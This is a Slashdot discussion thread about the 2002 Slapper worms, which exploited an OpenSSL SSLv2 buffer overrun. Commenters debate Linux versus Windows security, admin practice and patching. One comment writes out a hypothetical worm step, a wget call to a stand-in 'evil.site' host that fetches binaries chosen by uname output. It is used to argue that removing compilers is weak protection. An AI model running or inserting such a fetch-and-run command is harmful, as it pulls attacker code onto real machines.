1405821
story
randomErr writes
"The worms, Slapper.B and
Slapper.C, which exploits a known buffer overrun vulnerability in the Secure Sockets Layer 2.0 (SSLv2) handshake process has infected thousands of Web servers worldwide, according to Helsinki-based F-Secure Corp., a computer and network security company. "
Re:A few hopes... (Score:3, Insightful)
It would be preferrable to let the security at the bank to know that your about to commit armed robbery so they can stop you. Of course there is a difference between white and black hat hackers.
Response Time (Score:1, Insightful)
How does this worm affect the cryptographic security of the machine? Should affected webservers get new certificates?
Re:Bravo (Score:2, Insightful)
Yes, just like in the case with Windows.
The Worm (Score:4, Insightful)
Seems to me like older anti-MS comments are coming around and biting people in the ass.
Re:oh no! (Score:3, Insightful)
I think you're being *way* too paranoid.
What do you think are the chances Microsoft employees are contributing buggy patches to key open source projects, causing buffer overruns and worms?
Almost nil.
Even if they are, the maintainers share the blame for not reviewing them properly.
A spacious analogy. (Score:2, Insightful)
Exploiting a vulnerability like this is similar to walking down the ally behind the bank and finding an unlocked door that takes you straight into the vault. Some people (other politics aside such as "who would want to help such a stupid bank!?") would inform the bank, hoping to increase it's security. Typically in open source, when we find unlocked doors, we tell the maintainers as soon as possible. It's peer review.
I am not suggesting we do not release exploits though. Worms like this are a good practice run (and a great way of informing the sysadmins they need updates). *shrug*
Re:A few hopes... (Score:4, Insightful)
Any admin of either platform who uses best practices should be safe from most exploits. Shutdown unused services (and block the ports at your firewall if feasible), keep current on security patches, stay informed, and things should be manageable.
The catch is that just like there are clueless Windows admins, there are clueless Linux admins. And the clueless admins (for either platform) make their platform as a whole look bad.
It's a distro problem, not a linux problem (Score:5, Insightful)
IMHO if you need SSL on a webserver, you should be forced to go through the download + build + cert process yourself.
We're not really catching up (Score:5, Insightful)
Slapper is a minor event. I see a constant stream of Microsoft security alerts go through my mailbox, and you don't hear a peep out of these Microsoft apologists and cheerleaders until a serious Open Source vulnerability occurs once or twice a year.
All complex software will have bugs. It seems to me that Open Source bugs get fixed quicker, and Open Source admins are more inclined to patch in a timely manner than Microsoft ones by at least one order of magnitude. What do you expect from Windows, though, when its target market is people who don't know how to use computers.
Re:The Worm (Score:5, Insightful)
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
I am the administrator for two Linux servers, a Slackware 7.0 box and a Debian Woody box. I'm scared that I'll get rooted again, but do you know what I'm thinking anyway? "Bring it on." Let these worms propagate, let some publicity get out, and let the patches come. They will come, just as they always have. I'll be a wget %1;upgradepkg %1 or apt-get update;apt-get upgrade away from being back up to speed.
The open-source community, contrary to your assertion, has for years said two things 1) Lazy admins risk getting hacked and 2) Open source patches flow more freely than closed source ones. I don't think the number of holes against NT 4.0 (for example) is criticised, but rather the length of time between exploit and patch-- the criticism is of the number of documented, unpatched holes. If you show me a list of documented, unpatched holes, I'll show you a mailing list / IRC channel / news group that just found a list of things to do for the afternoon. Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows and resort to childish retorts and pleas for silence.
Bring it on, hackers, help us audit the code. Win prestige for you, win a better OS for us.
Re:A few hopes... (Score:2, Insightful)
We are about to release an "internet worm" which will wreak havoc on the worldwide "internet" if you don't pay a ransom of... (place little finger on lower lip) ...ONE BILLION DOLLARS!
Kind regards,
Dr Evil Don't forget to half-close your eyes
Re:A few hopes... (Score:3, Insightful)
Re:The Worm (Score:1, Insightful)
You cannot compare this to Windows holes, which are usually actual flaws with Windows (since Microsoft is so hell-bent on "integrating" everything with the operating system).
comparison (Score:4, Insightful)
There are currently an estimated 10,000 hosts infected with Slapper (any variant).
According to DShield's CodeRed history page [dshield.org], around 25,000 windos hosts are still estimated as CodeRed infected, one year after the event.
According to news.com [com.com], at the peak we had over 350,000 infected machines.
10,000 is about 2% of 350,000. No, Slapper is in not even comparable to CodeRed when it comes to spread, neither speed nor coverage.
It does, however, proof two things:
a) The Linux world is susceptible to the same generic diseases
b) For various reasons (more variety, better sysadmins, better security in general), it coped much better with an actual outbreak.
Re:A few hopes... (Score:2, Insightful)
sysadmins? (Score:4, Insightful)
Lots of comments here mention that sysadmins are to be faulted for the spread of this worm. I wonder how many of the infected systems were in fact installed by part-timers who then walked away, or are just being run by newer linux users.
Keep watching, you'll see more of this as linux becomes even easier to install and use. Joe User likes it because it's easy to install and comes with lots of services he can run right out of the box. Joe User doesn't do sysadmin work, what do you mean it doesn't update itself?
Automatic update utilities need to keep pace with the ease of use and hands-off administration that people generally apply to a desktop OS like Windows, otherwise we're basically handing all these new users a gun that's already pointed at their heads.
Re:We're not really catching up (Score:5, Insightful)
More importantly, Open Source problems stay visible until they are fixed. There's no hiding behind STO, no stonewalling.
Have you noticed how many pre-emptive security patches are made by Open Source developers? Where the announcements start with "someone pointed out this security flaw, and they were right, and we wanted to fix it before the exploits get created"? The "someone pointed out" part is a big deal. You can't get that with closed source vendorware, not proactively. As a result, security problems are frequently fixed long before they cause any problems at all.
Re:A false sense of security (Score:3, Insightful)
Good post man.
On Onions and Carrots (Score:4, Insightful)
If anyone takes the care to look at incidents.org site, one may see the facts for himself. Slapper didn't hit the stands. It is far from its Windows cousins, not only in terms of infected machines but also in attacks. And note specially the attacks. In less than 12 hours after Nimda's appearence I had more then 340000 Nimda "visits" on the network I surpervised. On what concerns Slapper, till now things are nearly on zero. Slapper is in no way a second Nimda.
Re:Linux? (Score:3, Insightful)
Retarded:A few hopes... (Score:3, Insightful)
Let me explain the process. You tell me if the analogy fits.
robber:
OpenSSL:
robber:
OpenSSL:
robber:
OpenSSL:
robber:
Slapper: The threat that wasn't? (Score:2, Insightful)
Simply put, as one person commented, a default Linux installation usually defaults to almost all services being turned OFF, whereas many Windows installations default to vulnerable services being ON.
As a result, the percentage of Linux servers that are actually intended to be servers is FAR greater than the percentage of Windows machines with IIS running that someone is actively maintaining.
As a result, more systems get patched sooner.
For a little dose of reality about Slapper: A friend of mine installed a honeypot on his network, waiting for a Slapper hit so he could check out this new, oh-so-uber threat to our wonderful Linux.
After a few days (might've been as long as a week), Slapper finally hit his machine.
Guess what else hit his machine? Code Red, a year-old Windows worm that made headlines *well over a year ago*, a minimum of 12 CR hits per DAY.
Now, given the Netcraft statistics where Apache has 40-50% of the marketshare of web servers on the 'net - Shouldn't Slapper be hitting more often than Code Red?
But it isn't, because Linux installations are more secure out-of-the-box, and are NOT vulnerable out of the box. One of the main reasons so many Windows machines aren't having IIS patches applied is because the user doesn't even know that IIS is running!
Re:Reasons (Score:5, Insightful)
Ah, but it's not an Apache exploit, but an SSLv2 exploit, no? Not every server running Apache is going to be running the SSL stuff as well. So suddenly, it's a bit smaller pool of boxes, and the 'installed base' thing comes back into prominence.
Re:Same mantra applies to Linux and MS sysadmins: (Score:5, Insightful)
Obviously, this won't work for people with only one box who want to run their personal web server off of it as well as do their dev work there, but for *real* servers this is a good practice. People who must have compilers on their web server are probably not using SSL, as you stated :-).
I keep seeing this comment, and every time I think how stupid it is. The compiler is not the security flaw. Given the number of comments like this, I fully expect the next version of this worm to have a "|| wget http://evil.site/worm-`uname -s`-`uname -m`" in place, and evil.site to have statically linked binaries. Then people will be saying "You don't need wget on a production webserver!" or some stupid shit like that. And it will move on to something else. They're already running code on your computer. You're already screwed.
(Isn't the first piece of the exploit written in assembler, as is typical for buffer exploits? Then they have to have targeted your platform specifically anyway. I just don't see why the compiler stage is necessary at all. They can just transfer the larger chunk of worm executable in the same way they transferred the source code.)
The real solution is to secure your system in the first place: disable services you aren't using. Patch ones you are. Given the month between the patch and the exploit, anyone following this practice will be unaffected.
If you're an admin... (Score:2, Insightful)
Re:Same mantra applies to Linux and MS sysadmins: (Score:5, Insightful)
It's not stupid at all. You are correct in stating that the compiler is not the security flaw. However, if the compiler were not there, this is the 4th worm in the past few months that you wouldn't have been vulnerable to. Simply because they *could* find other means of implementing the worm doesn't mean that you should make this one easy. There are 2 goals here:
As "stupid" as it may seem from an ivory tower perspective, in practice it helps. It's not a first line of defense, but it helps.
Re:A few hopes... (Score:3, Insightful)
While it incorporates profanity, and is therefore inherently rude, it isn't always meant or taken that way. There's a reason people right documentation, and it's not for finger exercise. No documentation I ever read was perfect, but most of it answers most questions I have about the application. I see the anagram used more commonly in the form of "DOH! I should have RTFM". It gets used pejoratively towards the people who are too freaking lazy to RTFM. You'd be amazed, for instance, how many people go on a newsgroup for an application, and ask questions that are addressed and answered in the first 25 displayed lines of the man page.
I answer a lot of questions on a newsgroup for a popular utility. On obvious RTFM questions, I always note the questioners name, domain, and writing style and cut them extra slack if they appear to be non-native speakers of English(technical translation is notoriously tricky). Otherwise, I simply copy/paste in the appropriate few lines of the man page, always including the headers to show where it came from, and introduced with something like "I could explain in my own words, but I think the author of the man page did a better job than I could."
Here on
In your troll against Linux culture: Somebody who's too lazy or stupid or illiterate to RTFM can't be a decent unix admin, and a sharp, rude reminder of that fact makes the good ones better, and makes the bad ones go back to windows.
Re:A few hopes... (Score:5, Insightful)
I'm a bit sad that this has turned into an "open source is STILL better than Windows" thing (even though I think it is). When it comes to security, everybody in the software game has problems. The finger pointing is useless. The lessons of this attack are exactly the same as the lessons of previous attacks, whether on close or open code:
1. Software engineering needs to improve. The exploitable errors are patterns that keep on happening. As a programmer myself, I have made these mistakes. As a trade/guild/profession we need to take the time to learn these patterns and methods to avoid them. We (and I definitely include myself in this) are doing a lousy job.
2. Computer operations are doing a lousy job of keeping systems secure. This one is important, but less important than issue one, becuase system admins shouldn't have to patch systems constantly. That they have to is more a measure of the failures of software engineering than the failures of system admins. That said, until we programmers get our house in order, it does fall on admins to patch, patch, patch. This sounds simple, but it isn't. When you are talking about mission-critical systems, it is extremely dangerous to apply untested patches to production machines. So dangerous that good admins don't do it. They test patches on their test machines, and well run systems will go through applications regression testing for each set of patches. This takes time. Time during which the production systems run unpatched. Sometimes these patches come in stochastic bunches such that some patches go unapplied for months, simply because the patch came in after regression testing is too far along to start over. This leads to an ironic situation: The most critical systems to a business are often the most vulnerable. Judgement about whether a patch is for an issue is so critical that it should short-circuit regression testing is a difficult art. And what if the production systems doesn't work after the patch? Sure, you can back up; you might keep your deployments in a CVS-like archive so you can roll back in minutes, but what if even a few minutes is a few hundred thousand dollars, or a few million? How many times can you afford the risk?
One problem with many of my fellow Free Software advocates (note I said "many" and not "all") is that they have not worked in mission-critical production environments in multi-billion dollar enterprises. Many of my fellow Open Source fans have worked in environments where it is no big deal to bring the server down for ten or fifteen minutes. When those are the only kind of shops you have worked in, it is difficult to understand how serious and difficult these issues can be for some.
So don't turn this into a Windows vs. Open Source thing. We (Open Source folks) have to suck it up this time. So what? The issues are the same. Our track record is still better, but, in this situation, the past is meaningless. Where are we now? Unfortunately we are in the same place (and so is the closed world): We are still making the same mistakes in software development and asking the admins to clean up the mess. We are even blaming the admins for it, when it really is not their fault.
All of this was triggered by the previous poster's correct comments about audit and assessment. He/She's right, except that these measures are locking the stable door after the horse has bolted (except sometimes the horse hasn't yet bolted -- that's why you still do it). The problem is we software developers have made a stable door that you can walk away from with it unlocked. If we hadn't done that in the first place...
It is getting better. I'm seeing more books on programming to avoid security problems. We're learning. But there are a lot of us, and we aren't all getting the education.
Re:On Onions and Carrots (Score:1, Insightful)
How many times have we heard that Linux is more secure, Linux admins are just better, Open Source programmers fix problems fast? How many times have we heard, in fact, that nothing like this could happen on Linux? This worm proves otherwise and that is the important point.